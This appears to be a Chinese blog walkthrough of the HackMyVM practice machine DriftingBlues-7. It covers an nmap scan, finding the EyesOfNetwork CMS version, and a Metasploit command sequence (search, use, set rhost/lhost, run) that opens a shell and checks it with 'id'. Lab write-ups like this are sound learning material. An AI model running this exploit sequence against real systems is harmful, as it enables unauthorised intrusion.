0
点赞
收藏
分享

微信扫一扫

Hackmyvm综合靶机 | Driftingblues-7

上古神龙 2022-04-17 阅读 85

前言提要

有史以来最简单的一个靶机,话不多说直接搞

信息收集

nmap扫描靶机IP

image-20220414204317585

出来一个80端口,直接往页面去(是一个登录页面)

image-20220414190626717

查看源代码没有东西,里面有很多css链接.就一个个的点开看了看,最终找到了CMS版本号

漏洞基本上都是基于版本来的,可能早期版本有后期就修复了。

image-20220414190231145

MSF提权

msfconsole

search eyesofnetwork
use 0
set rhost 192.168.xxx.xxx
set lhost 192.168.132.139
show options
run

image-20220414190355419

image-20220414190544663

攻击成功查看权限

shell
id

image-20220414205247451

image-20220414205334569

举报

相关推荐

0 条评论